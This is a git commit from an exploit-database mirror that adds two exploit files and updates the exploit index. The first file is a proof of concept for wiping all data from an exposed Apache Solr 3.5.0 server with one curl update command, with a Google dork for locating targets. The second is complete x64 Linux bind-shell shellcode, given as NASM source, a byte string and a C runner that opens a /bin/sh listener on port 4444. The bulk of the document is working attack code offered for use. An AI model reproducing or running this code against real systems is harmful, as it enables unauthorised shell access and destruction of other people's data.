DB: 2016-02-15
2 new exploits
This commit is contained in:
parent
a9d446b65b
commit
6e68aad606
3 changed files with 190 additions and 0 deletions
|
@ -35405,6 +35405,7 @@ id,file,description,date,author,platform,type,port
|
|||
39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
|
||||
39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0
|
||||
39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
|
||||
39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
|
||||
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
|
||||
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
|
||||
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
|
||||
|
@ -35659,6 +35660,7 @@ id,file,description,date,author,platform,type,port
|
|||
39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
|
||||
39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
|
||||
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
|
||||
39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0
|
||||
39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - CSRF Vulnerability",2016-02-08,hyp3rlinx,multiple,webapps,0
|
||||
39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
||||
39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
29
platforms/java/webapps/39418.txt
Executable file
29
platforms/java/webapps/39418.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: All Solr Data Can Be Delete
|
||||
# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
|
||||
[Statistics] [Info] [Distribution] [Ping] [Logging]
|
||||
# Date: 5/2/2016
|
||||
# Exploit Author: N37 [Myanmar]
|
||||
# Vendor Homepage: http://lucene.apache.org/solr/
|
||||
# Software Link: https://archive.apache.org/dist/lucene/solr/3.5.0/
|
||||
# Version: 3.5.0
|
||||
# Tested on: fedora 23
|
||||
|
||||
|
||||
Solr is open source enterprise search platform built on Apache Lucene.
|
||||
|
||||
It can be delete all data in solr. solr are use nlp, money of data research, data mining, some of mobile backend on vps .
|
||||
|
||||
|
||||
POC or Eg.
|
||||
|
||||
This Query is shwo all data in solr :
|
||||
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on
|
||||
|
||||
You can delete all data with curl in terminal :
|
||||
curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"
|
||||
|
||||
now you can check with first query in browser. All data are deleted.
|
||||
|
||||
|
||||
Regards,
|
||||
N37 [Myanmar]
|
159
platforms/lin_x86-64/shellcode/39149.c
Executable file
159
platforms/lin_x86-64/shellcode/39149.c
Executable file
|
@ -0,0 +1,159 @@
|
|||
/*---------------------------------------------------------------------------------------------------------------------
|
||||
* /*
|
||||
* Author: Scorpion
|
||||
* Copyright: (c) 2016 iQube. (http://iQube.io)
|
||||
* Release Date: January 1, 2016
|
||||
*
|
||||
* Description: x64 Linux null-free TCP bind port shellcode
|
||||
* Assembled Size: 103 bytes
|
||||
* Tested On: Ubuntu 14.04 LTS
|
||||
*
|
||||
* Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
|
||||
* ./bindshell
|
||||
* nc localhost 4444
|
||||
*
|
||||
*/
|
||||
|
||||
/*
|
||||
* NOTE: This C code binds on port 4444
|
||||
* The end of this file contains the .nasm source code
|
||||
* The Port can be Reconfigured According to your needs
|
||||
* Instructions for changing port number
|
||||
* Port obtainer change the port value accorddingly
|
||||
* port.py
|
||||
* import socket
|
||||
* port = 444
|
||||
* hex(socket.htons(port))
|
||||
* python port.py
|
||||
* Result : 0x5c11
|
||||
* Replace the obtained value in the shellcode to change the port number
|
||||
* For building the from .nasm source use
|
||||
* nasm -felf64 filename.nasm -o filename.o
|
||||
* ld filename.o -o filename
|
||||
* To inspect for nulls
|
||||
* objdump -M intel -D filename.o
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
; sock = socket(AF_INET, SOCK_STREAM, 0)
|
||||
; AF_INET = 2
|
||||
; SOCK_STREAM = 1
|
||||
; syscall number 41
|
||||
|
||||
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
|
||||
xor rsi, rsi
|
||||
mul rsi
|
||||
push byte 0x2 ;pusing argument to the stack
|
||||
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
|
||||
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
|
||||
push byte 0x29 ; pushing the syscall number into the rax by using stack
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
; copying the socket descripter from rax to rdi register so that we can use it further
|
||||
|
||||
xchg rax, rdi
|
||||
|
||||
; server.sin_family = AF_INET
|
||||
; server.sin_port = htons(PORT)
|
||||
; server.sin_addr.s_addr = INADDR_ANY
|
||||
; bzero(&server.sin_zero, 8)
|
||||
; setting up the data sctructure
|
||||
|
||||
push 0x2 ;AF_INET value is 2 so we are pushing 0x2
|
||||
mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
|
||||
push rsp ; saving the complete argument to rsi register
|
||||
pop rsi
|
||||
|
||||
|
||||
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
|
||||
; syscall number 49
|
||||
|
||||
push rdx ; Inserting the null to the stack
|
||||
push byte 0x10
|
||||
pop rdx ; value of the rdx register is set to 16 size sockaddr
|
||||
push byte 0x31
|
||||
pop rax ; rax register is set with 49 syscall for bind
|
||||
syscall
|
||||
|
||||
;listen the sockets for the incomming connections
|
||||
; listen(sock, MAX_CLIENTS)
|
||||
; syscall number 50
|
||||
|
||||
pop rsi
|
||||
push 0x32
|
||||
pop rax ; rax register is set to 50 syscall for listen
|
||||
syscall
|
||||
|
||||
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
|
||||
;syscall number 43
|
||||
|
||||
push 0x2b
|
||||
pop rax ; rax register is set to 43 syscall for accept
|
||||
syscall
|
||||
|
||||
; storing the client socket description
|
||||
mov r9, rax
|
||||
|
||||
; close parent
|
||||
push 0x3
|
||||
pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
|
||||
syscall
|
||||
|
||||
xchg rdi , r9
|
||||
xor rsi , rsi
|
||||
|
||||
; initilization of dup2
|
||||
push 0x3
|
||||
pop rsi ; setting argument to 3
|
||||
|
||||
|
||||
|
||||
duplicate:
|
||||
dec esi
|
||||
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
|
||||
syscall
|
||||
jne duplicate
|
||||
|
||||
|
||||
execve: ; Execve format , execve("/bin/sh", 0 , 0)
|
||||
xor rsi , rsi
|
||||
mul rsi ; zeroed rax , rdx register
|
||||
push ax ; terminate string with null
|
||||
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
|
||||
push rbx
|
||||
push rsp
|
||||
pop rdi ; set RDI
|
||||
push byte 0x3b ; execve syscall number (59)
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
|
||||
//Port number this value can be obtained from the above instructions
|
||||
"\x11\x5c"
|
||||
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
|
||||
|
||||
|
||||
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue